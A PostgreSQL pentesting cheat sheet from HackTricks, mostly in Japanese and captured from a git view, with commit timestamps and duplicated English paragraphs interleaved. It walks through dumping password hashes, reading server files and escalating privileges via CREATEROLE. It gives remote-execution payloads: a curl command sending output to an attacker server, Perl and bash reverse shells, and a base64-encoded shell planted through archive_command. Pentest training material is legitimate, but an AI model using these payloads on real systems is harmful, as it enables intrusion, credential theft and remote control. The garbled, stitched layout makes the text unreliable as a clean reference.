hacktricks/network-services-pentesting/pentesting-postgresql.md

741 lines
42 KiB
Markdown
Raw Normal View History

2023-07-07 23:42:27 +00:00
# 5432,5433 - PostgreSQLのペンテスト
2022-04-28 16:01:33 +00:00
2022-09-30 10:43:59 +00:00
![](<../.gitbook/assets/image (9) (1) (2).png>)
2022-08-31 22:35:39 +00:00
\
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)を使用して、世界で最も高度なコミュニティツールによって強化された**ワークフローを簡単に構築**および**自動化**します。\
2023-07-07 23:42:27 +00:00
今すぐアクセスを取得:
2022-08-31 22:35:39 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
2022-04-28 16:01:33 +00:00
<details>
2023-04-25 18:35:28 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-04-28 16:01:33 +00:00
* **サイバーセキュリティ企業で働いていますか?** **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSを入手**したいですかまたは、HackTricksを**PDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を入手してください。
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **ハッキングのトリックを共有するには、PRを** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **および** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **に提出してください。**
2022-04-28 16:01:33 +00:00
</details>
2023-07-07 23:42:27 +00:00
## **基本情報**
2022-04-28 16:01:33 +00:00
2023-07-07 23:42:27 +00:00
**PostgreSQL**は、SQL言語を使用しているオープンソースのオブジェクト関係データベースシステムです。
2023-07-07 23:42:27 +00:00
**デフォルトポート:** 5432で、このポートが既に使用されている場合、おそらく使用されていない次のポートおそらく5433がpostgresqlに使用されます。
2021-11-12 01:11:08 +00:00
```
PORT STATE SERVICE
5432/tcp open pgsql
```
## 接続と基本的な列挙
### Connect to PostgreSQL
### PostgreSQLへの接続
To connect to a PostgreSQL database, you can use the `psql` command-line tool or any PostgreSQL client application. The `psql` tool is commonly used and comes pre-installed with PostgreSQL.
PostgreSQLデータベースに接続するには、`psql`コマンドラインツールまたは任意のPostgreSQLクライアントアプリケーションを使用できます。`psql`ツールは一般的に使用され、PostgreSQLと一緒に事前にインストールされています。
To connect using `psql`, open a terminal and run the following command:
`psql -h <host> -p <port> -U <username> -d <database>`
Replace `<host>`, `<port>`, `<username>`, and `<database>` with the appropriate values for your PostgreSQL server.
`psql`を使用して接続するには、ターミナルを開き、次のコマンドを実行します。
`psql -h <ホスト> -p <ポート> -U <ユーザ名> -d <データベース>`
`<ホスト>`、`<ポート>`、`<ユーザ名>`、および`<データベース>`を、PostgreSQLサーバーの適切な値に置き換えてください。
### Basic Enumeration
### 基本的な列挙
Once connected to the PostgreSQL server, you can perform basic enumeration to gather information about the database.
PostgreSQLサーバーに接続したら、基本的な列挙を実行してデータベースに関する情報を収集できます。
#### List Databases
#### データベースの一覧表示
To list all the databases in the PostgreSQL server, use the following command:
`\l`
PostgreSQLサーバーのすべてのデータベースを一覧表示するには、次のコマンドを使用します。
`\l`
#### Switch Database
#### データベースの切り替え
To switch to a specific database, use the following command:
`\c <database>`
Replace `<database>` with the name of the database you want to switch to.
特定のデータベースに切り替えるには、次のコマンドを使用します。
`\c <データベース>`
`<データベース>`を切り替えたいデータベースの名前に置き換えてください。
#### List Tables
2023-07-07 23:42:27 +00:00
#### テーブルの一覧表示
To list all the tables in the current database, use the following command:
`\dt`
現在のデータベースのすべてのテーブルを一覧表示するには、次のコマンドを使用します。
`\dt`
#### Describe Table
#### テーブルの説明
To describe the structure of a specific table, use the following command:
`\d <table>`
Replace `<table>` with the name of the table you want to describe.
特定のテーブルの構造を説明するには、次のコマンドを使用します。
`\d <テーブル>`
`<テーブル>`を説明したいテーブルの名前に置き換えてください。
#### Execute SQL Queries
#### SQLクエリの実行
You can execute SQL queries directly from the `psql` prompt. Simply type your SQL query and press Enter to execute it.
`psql`プロンプトから直接SQLクエリを実行できます。SQLクエリを入力し、Enterキーを押して実行します。
For example, to select all rows from a table, use the following command:
たとえば、テーブルからすべての行を選択するには、次のコマンドを使用します。
`SELECT * FROM <table>;`
Replace `<table>` with the name of the table you want to query.
`<table>`をクエリしたいテーブルの名前に置き換えてください。
```bash
psql -U <myuser> # Open psql console with user
2021-08-28 16:44:35 +00:00
psql -h <host> -U <username> -d <database> # Remote connection
psql -h <host> -p <port> -U <username> -W <password> <database> # Remote connection
```
```sql
psql -h localhost -d <database_name> -U <User> #Password will be prompted
\list # List databases
\c <database> # use the database
\d # List tables
\du+ # Get users roles
2022-10-07 12:55:24 +00:00
# Get current user
SELECT user;
# Get current database
SELECT current_catalog;
2022-10-07 15:38:50 +00:00
# List schemas
SELECT schema_name,schema_owner FROM information_schema.schemata;
\dn+
#List databases
SELECT datname FROM pg_database;
#Read credentials (usernames + pwd hash)
SELECT usename, passwd from pg_shadow;
2022-11-03 13:30:00 +00:00
# Get languages
SELECT lanname,lanacl FROM pg_language;
2022-10-08 16:35:25 +00:00
2022-11-03 18:57:14 +00:00
# Show installed extensions
2022-11-03 13:30:00 +00:00
SHOW rds.extensions;
SELECT * FROM pg_extension;
2022-11-08 23:13:00 +00:00
# Get history of commands executed
\s
2022-10-07 12:55:24 +00:00
```
{% hint style="warning" %}
**`\list`** を実行して、**`rdsadmin`** というデータベースが見つかった場合、AWSのPostgreSQLデータベース内にいることがわかります。
{% endhint %}
**PostgreSQLデータベースを悪用する方法**の詳細については、以下を参照してください:
2022-10-07 12:55:24 +00:00
{% content-ref url="../pentesting-web/sql-injection/postgresql-injection/" %}
[postgresql-injection](../pentesting-web/sql-injection/postgresql-injection/)
{% endcontent-ref %}
## 自動列挙
2022-10-07 12:55:24 +00:00
```
msf> use auxiliary/scanner/postgres/postgres_version
msf> use auxiliary/scanner/postgres/postgres_dbname_flag_injection
```
### [**ブルートフォース**](../generic-methodologies-and-resources/brute-force.md#postgresql)
2022-10-07 12:55:24 +00:00
2023-07-07 23:42:27 +00:00
### **ポートスキャン**
2022-11-08 23:13:00 +00:00
[**この研究**](https://www.exploit-db.com/papers/13084)によると、接続試行が失敗すると、`dblink`は`sqlclient_unable_to_establish_sqlconnection`という例外をスローします。この例外にはエラーの説明が含まれています。以下にこれらの詳細の例を示します。
2022-11-08 23:13:00 +00:00
```sql
SELECT * FROM dblink_connect('host=1.2.3.4
2023-07-07 23:42:27 +00:00
port=5678
user=name
password=secret
dbname=abc
connect_timeout=10');
2022-11-08 23:13:00 +00:00
```
2023-07-07 23:42:27 +00:00
* ホストがダウンしています
2022-11-08 23:13:00 +00:00
`詳細: サーバーに接続できませんでした: ホスト "1.2.3.4" 上で TCP/IP 接続を受け入れているポート 5678 でサーバーが実行されていますか?`
2022-11-08 23:13:00 +00:00
2023-07-07 23:42:27 +00:00
* ポートが閉じています
2022-11-08 23:13:00 +00:00
```
DETAIL: could not connect to server: Connection refused Is the server
running on host "1.2.3.4" and accepting TCP/IP connections on port 5678?
```
2023-07-07 23:42:27 +00:00
* ポートが開いています
2022-11-08 23:13:00 +00:00
```
DETAIL: server closed the connection unexpectedly This probably means
the server terminated abnormally before or while processing the request
```
2023-07-07 23:42:27 +00:00
または
2022-11-08 23:13:00 +00:00
```
DETAIL: FATAL: password authentication failed for user "name"
```
* ポートが開いているかフィルタリングされています。
2022-11-08 23:13:00 +00:00
```
DETAIL: could not connect to server: Connection timed out Is the server
running on host "1.2.3.4" and accepting TCP/IP connections on port 5678?
```
2023-07-07 23:42:27 +00:00
残念ながら、PL/pgSQL関数内で例外の詳細を取得する方法はありません。ただし、PostgreSQLサーバーに直接接続できれば、詳細を取得することができます。システムテーブルから直接ユーザ名とパスワードを取得することができない場合は、前のセクションで説明したワードリスト攻撃が成功する可能性があります。
2022-11-08 23:13:00 +00:00
2023-07-07 23:42:27 +00:00
## 特権の列挙
2022-11-08 23:13:00 +00:00
2023-07-07 23:42:27 +00:00
### ロール
2022-10-07 12:55:24 +00:00
2023-07-07 23:42:27 +00:00
| ロールの種類 | |
2022-10-07 12:55:24 +00:00
| -------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------- |
2023-07-07 23:42:27 +00:00
| rolsuper | ロールにはスーパーユーザー特権があります |
| rolinherit | ロールは、そのメンバーであるロールの特権を自動的に継承します |
| rolcreaterole | ロールは他のロールを作成できます |
| rolcreatedb | ロールはデータベースを作成できます |
| rolcanlogin | ロールはログインできます。つまり、このロールは初期セッション認証識別子として与えることができます |
| rolreplication | ロールはレプリケーションロールです。レプリケーションロールはレプリケーション接続を開始し、レプリケーションスロットを作成および削除することができます。 |
| rolconnlimit | ログインできるロールに対して、この設定はこのロールが作成できる同時接続の最大数を設定します。-1は制限なしを意味します。 |
2023-07-07 23:42:27 +00:00
| rolpassword | パスワードではありません(常に`********`と表示されます) |
| rolvaliduntil | パスワードの有効期限パスワード認証にのみ使用されます。期限がない場合はnullです。 |
2023-07-07 23:42:27 +00:00
| rolbypassrls | ロールはすべての行レベルセキュリティポリシーをバイパスします。詳細については、[セクション5.8](https://www.postgresql.org/docs/current/ddl-rowsecurity.html)を参照してください。 |
| rolconfig | 実行時設定変数のロール固有のデフォルト |
2023-07-07 23:42:27 +00:00
| oid | ロールのID |
#### 興味深いグループ
* もし**`pg_execute_server_program`**のメンバーであれば、**プログラムを実行**できます
* もし**`pg_read_server_files`**のメンバーであれば、**ファイルを読み取る**ことができます
* もし**`pg_write_server_files`**のメンバーであれば、**ファイルを書き込む**ことができます
2022-10-07 12:55:24 +00:00
{% hint style="info" %}
2023-07-07 23:42:27 +00:00
Postgresでは、**ユーザー**、**グループ**、**ロール**は**同じもの**です。それは単に**使用方法**と**ログインを許可するかどうか**に依存します。
2022-10-07 12:55:24 +00:00
{% endhint %}
```sql
# Get users roles
\du
#Get users roles & groups
# r.rolpassword
# r.rolconfig,
2023-07-07 23:42:27 +00:00
SELECT
r.rolname,
r.rolsuper,
r.rolinherit,
r.rolcreaterole,
r.rolcreatedb,
r.rolcanlogin,
r.rolbypassrls,
r.rolconnlimit,
r.rolvaliduntil,
r.oid,
ARRAY(SELECT b.rolname
FROM pg_catalog.pg_auth_members m
JOIN pg_catalog.pg_roles b ON (m.roleid = b.oid)
WHERE m.member = r.oid) as memberof
, r.rolreplication
FROM pg_catalog.pg_roles r
ORDER BY 1;
2022-10-07 12:55:24 +00:00
# Check if current user is superiser
## If response is "on" then true, if "off" then false
SELECT current_setting('is_superuser');
# Try to grant access to groups
## For doing this you need to be admin on the role, superadmin or have CREATEROLE role (see next section)
2022-10-08 16:35:25 +00:00
GRANT pg_execute_server_program TO "username";
GRANT pg_read_server_files TO "username";
GRANT pg_write_server_files TO "username";
2023-07-07 23:42:27 +00:00
## You will probably get this error:
2022-10-07 12:55:24 +00:00
## Cannot GRANT on the "pg_write_server_files" role without being a member of the role.
# Create new role (user) as member of a role (group)
CREATE ROLE u LOGIN PASSWORD 'lriohfugwebfdwrr' IN GROUP pg_read_server_files;
## Common error
## Cannot GRANT on the "pg_read_server_files" role without being a member of the role.
```
2023-07-07 23:42:27 +00:00
### テーブル
Tables are the basic building blocks of a PostgreSQL database. They store data in a structured format, with rows and columns. Each table has a name and a set of columns, which define the type of data that can be stored in each column.
テーブルは、PostgreSQLデータベースの基本的な構成要素です。テーブルは、行と列を持つ構造化された形式でデータを格納します。各テーブルには名前と列のセットがあり、各列に格納できるデータの型を定義します。
2022-10-07 12:55:24 +00:00
```sql
# Get owners of tables
select schemaname,tablename,tableowner from pg_tables;
## Get tables where user is owner
select schemaname,tablename,tableowner from pg_tables WHERE tableowner = 'postgres';
2022-08-31 22:35:39 +00:00
2022-10-07 12:55:24 +00:00
# Get your permissions over tables
SELECT grantee,table_schema,table_name,privilege_type FROM information_schema.role_table_grants;
2022-08-31 22:35:39 +00:00
2022-10-07 12:55:24 +00:00
#Check users privileges over a table (pg_shadow on this example)
## If nothing, you don't have any permission
2022-10-07 14:00:19 +00:00
SELECT grantee,table_schema,table_name,privilege_type FROM information_schema.role_table_grants WHERE table_name='pg_shadow';
2022-10-07 12:55:24 +00:00
```
2023-07-07 23:42:27 +00:00
### 関数
Functions in PostgreSQL are named blocks of code that can be executed by calling their name. They are used to perform specific tasks and can accept parameters and return values.
PostgreSQL provides a wide range of built-in functions that can be used for various purposes, such as mathematical calculations, string manipulation, date and time operations, and more. These functions can be called directly in SQL queries or used within other functions.
2023-07-07 23:42:27 +00:00
In addition to the built-in functions, PostgreSQL also allows users to create their own custom functions. Custom functions can be written in various programming languages, including SQL, PL/pgSQL, PL/Python, PL/Perl, and more. This flexibility allows developers to extend the functionality of PostgreSQL and create custom solutions tailored to their specific needs.
2023-07-07 23:42:27 +00:00
When performing a penetration test on a PostgreSQL database, it is important to identify and analyze the functions that are exposed by the database. By understanding the functionality and behavior of these functions, a penetration tester can identify potential vulnerabilities and security weaknesses that can be exploited.
During the penetration testing process, it is common to analyze the input and output parameters of the functions, as well as the logic and flow of the code. This can help identify potential injection vulnerabilities, privilege escalation issues, and other security risks.
In conclusion, functions play a crucial role in PostgreSQL databases and can be a valuable target for penetration testers. By understanding the functionality and behavior of these functions, testers can identify and exploit potential vulnerabilities, helping to improve the overall security of the database.
2022-10-07 14:00:19 +00:00
```sql
2022-10-07 15:38:50 +00:00
# Interesting functions are inside pg_catalog
\df * #Get all
\df *pg_ls* #Get by substring
2022-10-07 14:00:19 +00:00
\df+ pg_read_binary_file #Check who has access
2022-10-07 15:38:50 +00:00
# Get all functions of a schema
\df pg_catalog.*
# Get all functions of a schema (pg_catalog in this case)
SELECT routines.routine_name, parameters.data_type, parameters.ordinal_position
FROM information_schema.routines
2023-07-07 23:42:27 +00:00
LEFT JOIN information_schema.parameters ON routines.specific_name=parameters.specific_name
2022-10-07 15:38:50 +00:00
WHERE routines.specific_schema='pg_catalog'
ORDER BY routines.routine_name, parameters.ordinal_position;
2022-11-08 21:47:24 +00:00
# Another aparent option
SELECT * FROM pg_proc;
```
2023-07-07 23:42:27 +00:00
## ファイルシステムの操作
2022-11-08 21:47:24 +00:00
2023-07-07 23:42:27 +00:00
### ディレクトリとファイルの読み取り
2022-12-20 18:10:20 +00:00
この[**commit**](https://github.com/postgres/postgres/commit/0fdc8495bff02684142a44ab3bc5b18a8ca1863a)では、**`DEFAULT_ROLE_READ_SERVER_FILES`**グループ(**`pg_read_server_files`**と呼ばれる)のメンバーと**スーパーユーザー**は、任意のパスで**`COPY`**メソッドを使用できます(`genfile.c`の`convert_and_check_filename`をチェックしてください)。
2022-12-20 18:10:20 +00:00
```sql
# Read file
CREATE TABLE demo(t text);
COPY demo from '/etc/passwd';
SELECT * FROM demo;
```
{% hint style="warning" %}
2023-07-07 23:42:27 +00:00
スーパーユーザーではないが、**CREATEROLE** 権限を持っている場合、**自分自身をそのグループのメンバーにすることができます:**
2022-12-20 18:10:20 +00:00
```sql
GRANT pg_read_server_files TO username;
```
2023-07-07 23:42:27 +00:00
[**詳細情報**](pentesting-postgresql.md#privilege-escalation-with-createrole)
2022-12-20 18:10:20 +00:00
{% endhint %}
他の**postgres関数**を使用して、**ファイルを読み取るかディレクトリをリストする**ことができます。これらの関数は、**スーパーユーザー**および**明示的な権限を持つユーザー**のみが使用できます。
2022-12-20 18:10:20 +00:00
```sql
# Before executing these function go to the postgres DB (not in the template1)
\c postgres
## If you don't do this, you might get "permission denied" error even if you have permission
select * from pg_ls_dir('/tmp');
select * from pg_read_file('/etc/passwd', 0, 1000000);
select * from pg_read_binary_file('/etc/passwd');
# Check who has permissions
\df+ pg_ls_dir
\df+ pg_read_file
\df+ pg_read_binary_file
# Try to grant permissions
GRANT EXECUTE ON function pg_catalog.pg_ls_dir(text) TO username;
# By default you can only access files in the datadirectory
SHOW data_directory;
# But if you are a member of the group pg_read_server_files
# You can access any file, anywhere
GRANT pg_read_server_files TO username;
# Check CREATEROLE privilege escalation
```
**さらに多くの関数**は[https://www.postgresql.org/docs/current/functions-admin.html](https://www.postgresql.org/docs/current/functions-admin.html)で見つけることができます。
2022-12-20 18:10:20 +00:00
### 簡単なファイル書き込み
2022-12-20 18:10:20 +00:00
ファイルの書き込みには、**スーパーユーザー**と**`pg_write_server_files`**のメンバーのみがcopyを使用できます。
{% code overflow="wrap" %}
2022-12-20 18:10:20 +00:00
```sql
copy (select convert_from(decode('<ENCODED_PAYLOAD>','base64'),'utf-8')) to '/just/a/path.exec';
```
{% endcode %}
2022-12-20 18:10:20 +00:00
{% hint style="warning" %}
覚えておいてください。スーパーユーザーではない場合でも、**`CREATEROLE`** 権限を持っている場合は、**そのグループのメンバーになることができます:**
2022-12-20 18:10:20 +00:00
```sql
GRANT pg_write_server_files TO username;
```
2023-07-07 23:42:27 +00:00
[**詳細情報**](pentesting-postgresql.md#privilege-escalation-with-createrole)
2022-12-20 18:10:20 +00:00
{% endhint %}
2023-07-07 23:42:27 +00:00
COPYは改行文字を処理できないため、ベース64ペイロードを使用していても、**1行のコマンドを送信する必要があります**。\
このテクニックの非常に重要な制限は、**`copy`はバイナリファイルの書き込みに使用できないため、一部のバイナリ値を変更します。**
2022-12-20 18:10:20 +00:00
2023-07-07 23:42:27 +00:00
### **バイナリファイルのアップロード**
2022-12-20 18:10:20 +00:00
2023-07-07 23:42:27 +00:00
ただし、**大きなバイナリファイルをアップロードするための他のテクニック**があります:
2022-12-20 18:10:20 +00:00
{% content-ref url="../pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md" %}
[big-binary-files-upload-postgresql.md](../pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md)
{% endcontent-ref %}
## <img src="../.gitbook/assets/i3.png" alt="" data-size="original">
2023-07-07 23:42:27 +00:00
**バグバウンティのヒント****Intigriti**に**サインアップ**してください。これは、ハッカーによって作成されたプレミアムな**バグバウンティプラットフォーム**です!今すぐ[**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks)に参加して、最大**$100,000**のバウンティを獲得しましょう!
2022-12-20 18:10:20 +00:00
{% embed url="https://go.intigriti.com/hacktricks" %}
## RCE
2023-07-07 23:42:27 +00:00
### **プログラムへのRCE**
2022-12-20 18:10:20 +00:00
2023-07-07 23:42:27 +00:00
[バージョン9.3](https://www.postgresql.org/docs/9.3/release-9-3.html)以降、RCEには**スーパーユーザー**と**`pg_execute_server_program`**グループのメンバーのみがcopyを使用できます情報の外部流出
2022-12-20 18:10:20 +00:00
```sql
'; copy (SELECT '') to program 'curl http://YOUR-SERVER?f=`ls -l|base64`'-- -
```
実行の例:
2022-12-20 18:10:20 +00:00
```bash
#PoC
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;
DROP TABLE IF EXISTS cmd_exec;
#Reverse shell
#Notice that in order to scape a single quote you need to put 2 single quotes
COPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.104:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;''';
```
{% hint style="warning" %}
2023-07-07 23:42:27 +00:00
スーパーユーザーではないが、**`CREATEROLE`** 権限を持っている場合、**そのグループのメンバーに自分自身を追加することができます:**
2022-12-20 18:10:20 +00:00
```sql
GRANT pg_execute_server_program TO username;
```
2023-07-07 23:42:27 +00:00
[**詳細はこちら**](pentesting-postgresql.md#privilege-escalation-with-createrole)
2022-12-20 18:10:20 +00:00
{% endhint %}
2023-07-07 23:42:27 +00:00
または、**metasploit**の`multi/postgres/postgres_copy_from_program_cmd_exec`モジュールを使用します。この脆弱性についての詳細は[**こちら**](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5)を参照してください。CVE-2019-9193として報告されていますが、Postgesはこれを[機能として修正しない](https://www.postgresql.org/about/news/cve-2019-9193-not-a-security-vulnerability-1935/)と宣言しました。
2022-12-20 18:10:20 +00:00
2023-07-07 23:42:27 +00:00
### PostgreSQL言語を使用したRCE
2022-12-20 18:10:20 +00:00
{% content-ref url="../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md" %}
[rce-with-postgresql-languages.md](../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md)
{% endcontent-ref %}
2023-07-07 23:42:27 +00:00
### PostgreSQL拡張機能を使用したRCE
2022-12-20 18:10:20 +00:00
前の投稿から**バイナリファイルのアップロード方法**を学んだ後、**PostgreSQL拡張機能をアップロードしてロードすることでRCEを取得**することができます。
2022-12-20 18:10:20 +00:00
{% content-ref url="../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md" %}
[rce-with-postgresql-extensions.md](../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md)
{% endcontent-ref %}
2023-07-07 23:42:27 +00:00
### PostgreSQL設定ファイルRCE
2022-12-20 18:10:20 +00:00
2023-07-07 23:42:27 +00:00
PostgreSQLの**設定ファイル**は、データベースを実行している**postgresユーザー**によって**書き込み可能**です。したがって、**スーパーユーザー**としてファイルシステムにファイルを書き込むことができ、したがってこのファイルを**上書き**することができます。
2022-12-20 18:10:20 +00:00
![](<../.gitbook/assets/image (303).png>)
2023-07-07 23:42:27 +00:00
#### **ssl\_passphrase\_commandを使用したRCE**
2023-07-07 23:42:27 +00:00
設定ファイルには、RCEにつながる可能性のあるいくつかの興味深い属性があります。
2022-12-20 18:10:20 +00:00
2023-07-07 23:42:27 +00:00
* `ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'` データベースのプライベートキーへのパス
* `ssl_passphrase_command = ''` プライベートファイルがパスワードで保護されている場合暗号化されている場合、postgresqlはこの属性で指定されたコマンドを実行します。
* `ssl_passphrase_command_supports_reload = off` この属性が**on**の場合、キーがパスワードで保護されている場合に実行される**コマンド**は、`pg_reload_conf()`が**実行**されたときに**実行されます**。
2022-12-20 18:10:20 +00:00
2023-07-07 23:42:27 +00:00
したがって、攻撃者は次の手順を実行する必要があります:
2022-12-20 18:10:20 +00:00
2023-07-07 23:42:27 +00:00
1. サーバーから**プライベートキーをダンプ**する
2. ダウンロードしたプライベートキーを**暗号化**する:`rsa -aes256 -in downloaded-ssl-cert-snakeoil.key -out ssl-cert-snakeoil.key`
3. 上書きする
4. 現在のpostgresqlの**設定**を**ダンプ**する
5. 上記の属性設定で**設定**を**上書き**する:
- `ssl_passphrase_command = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/8111 0>&1"'`
- `ssl_passphrase_command_supports_reload = on`
6. `pg_reload_conf()`を実行する
2022-12-20 18:10:20 +00:00
2023-07-07 23:42:27 +00:00
これをテストしてみたところ、**プライベートキーファイルが640の権限を持ち**、**rootが所有**し、**グループssl-certまたはpostgres**postgresユーザーが読み取れるようにである必要があることがわかりました。また、_ /var/lib/postgresql/12/main_に配置されている必要があります。
2022-12-20 18:10:20 +00:00
2023-07-07 23:42:27 +00:00
このテクニックについての**詳細は[こちら](https://pulsesecurity.co.nz/articles/postgres-sqli)**を参照してください。
2022-12-20 18:10:20 +00:00
2023-07-07 23:42:27 +00:00
#### **archive\_commandを使用したRCE**
2023-07-07 23:42:27 +00:00
設定ファイルのもう1つの攻撃可能な属性は`archive_command`です。
2023-07-07 23:42:27 +00:00
これを動作させるには、`archive_mode`設定が`'on'`または`'always'`である必要があります。それが真である場合、`archive_command`のコマンドを上書きして、WALWrite-Ahead Logging操作を介して実行することができます。
2023-07-07 23:42:27 +00:00
一般的な手順は次のとおりです:
2023-07-07 23:42:27 +00:00
1. アーカイブモードが有効かどうかを確認する:`SELECT current_setting('archive_mode')`
2. ペイロードで`archive_command`を上書きする。たとえば、リバースシェル:`archive_command = 'echo "dXNlIFNvY2tldDskaT0iMTAuMC4wLjEiOyRwPTQyNDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307" | base64 --decode | perl'`
2023-07-07 23:42:27 +00:00
3. 設定をリロードする:`SELECT pg_reload_conf()`
4. WAL操作を強制的に実行し、アーカイブコマンドを呼び出す`SELECT pg_switch_wal()`または一部のPostgresバージョンでは`SELECT pg_switch_xlog()`
2023-07-07 23:42:27 +00:00
この設定とWALに関する**詳細は[こちら](https://medium.com/dont-code-me-on-that/postgres-sql-injection-to-rce-with-archive-command-c8ce955cf3d3)**を参照してください。
2022-10-07 12:55:24 +00:00
## **Postgres Privesc**
2022-10-07 12:55:24 +00:00
### CREATEROLE Privesc
2022-10-07 12:55:24 +00:00
#### **Grant**
2023-07-07 23:42:27 +00:00
[**ドキュメント**](https://www.postgresql.org/docs/13/sql-grant.html)によると、**`CREATEROLE`**権限を持つロールは、**スーパーユーザーではない****任意のロールのメンバーシップを付与または取り消す**ことができます。
2022-10-07 12:55:24 +00:00
2023-07-07 23:42:27 +00:00
したがって、**`CREATEROLE`**権限がある場合、他の**ロール**(スーパーユーザーではない)へのアクセス権限を自分自身に付与することができ、ファイルの読み書きやコマンドの実行などのオプションを得ることができます。
2022-10-07 12:55:24 +00:00
```sql
# Access to execute commands
GRANT pg_execute_server_program TO username;
# Access to read files
GRANT pg_read_server_files TO username;
# Access to write files
GRANT pg_write_server_files TO username;
```
2023-07-07 23:42:27 +00:00
#### パスワードの変更
2022-10-07 12:55:24 +00:00
2023-07-07 23:42:27 +00:00
この役割を持つユーザーは、他の**非スーパーユーザー**の**パスワード**を**変更**することもできます。
2022-10-07 12:55:24 +00:00
```sql
#Change password
ALTER USER user_name WITH PASSWORD 'new_password';
```
#### SUPERUSERへの昇格
2022-10-07 12:55:24 +00:00
**ローカルユーザーがパスワードを入力せずにPostgreSQLにログインできる**ことは非常に一般的です。したがって、**コードの実行権限を取得した後は、これらの権限を悪用して`SUPERUSER`ロールを取得する**ことができます。
2022-10-07 12:55:24 +00:00
```sql
COPY (select '') to PROGRAM 'psql -U <super_user> -c "ALTER USER <your_username> WITH SUPERUSER;"';
```
{% hint style="info" %}
2023-07-07 23:42:27 +00:00
これは通常、**`pg_hba.conf`** ファイル内の次の行によって可能になります:
2022-10-07 12:55:24 +00:00
```bash
# "local" is for Unix domain socket connections only
local all all trust
# IPv4 local connections:
host all all 127.0.0.1/32 trust
# IPv6 local connections:
host all all ::1/128 trust
```
{% endhint %}
2023-07-07 23:42:27 +00:00
### **ALTER TABLEの特権昇格**
2022-10-08 16:35:25 +00:00
2023-07-07 23:42:27 +00:00
[この解説記事](https://www.wiz.io/blog/the-cloud-has-an-isolation-problem-postgresql-vulnerabilities)では、Postgres GCPでALTER TABLEの特権を悪用して特権昇格が可能であった方法が説明されています。
2022-10-08 16:35:25 +00:00
2023-07-07 23:42:27 +00:00
通常、別のユーザーをテーブルの所有者にすることはエラーが発生するはずですが、どうやらGCPでは非スーパーユーザーのpostgresユーザーにそのオプションが与えられていました。
2022-10-08 16:35:25 +00:00
この考えを、インデックス関数を持つテーブルに対してINSERT/UPDATE/ANALYZEコマンドが実行されると、その関数がコマンドの一部として所有者の権限で呼び出されるという事実と結びつけると、テーブルに対して関数を持つインデックスを作成し、そのテーブルに対して所有者の特権を持つスーパーユーザーに与え、その後、悪意のある関数を使用してテーブル上でANALYZEを実行することが可能です。この悪意のある関数は所有者の特権を使用してコマンドを実行することができます。
2022-10-08 16:35:25 +00:00
```c
2023-07-07 23:42:27 +00:00
GetUserIdAndSecContext(&save_userid, &save_sec_context);
SetUserIdAndSecContext(onerel->rd_rel->relowner,
save_sec_context | SECURITY_RESTRICTED_OPERATION);
2022-10-08 16:35:25 +00:00
```
2023-07-07 23:42:27 +00:00
#### 悪用
2022-10-08 16:35:25 +00:00
2023-07-07 23:42:27 +00:00
1. 新しいテーブルを作成します。
2. テーブルにいくつかのダミーコンテンツを挿入し、インデックス関数が処理するものを用意します。
2023-07-07 23:42:27 +00:00
3. テーブルに悪意のあるインデックス関数(コード実行ペイロードを含む)を作成します。
4. テーブルの所有者を cloudsqladmin に変更します。これはGCPのスーパーユーザーロールであり、Cloud SQLがデータベースを維持および管理するために使用されます。
2023-07-07 23:42:27 +00:00
5. テーブルをANALYZEし、PostgreSQLエンジンがユーザーコンテキストをテーブルの所有者cloudsqladminに切り替え、cloudsqladminの権限で悪意のあるインデックス関数を呼び出すことで、以前に実行する権限がなかったシェルコマンドを実行します。
2022-10-08 16:35:25 +00:00
2023-07-07 23:42:27 +00:00
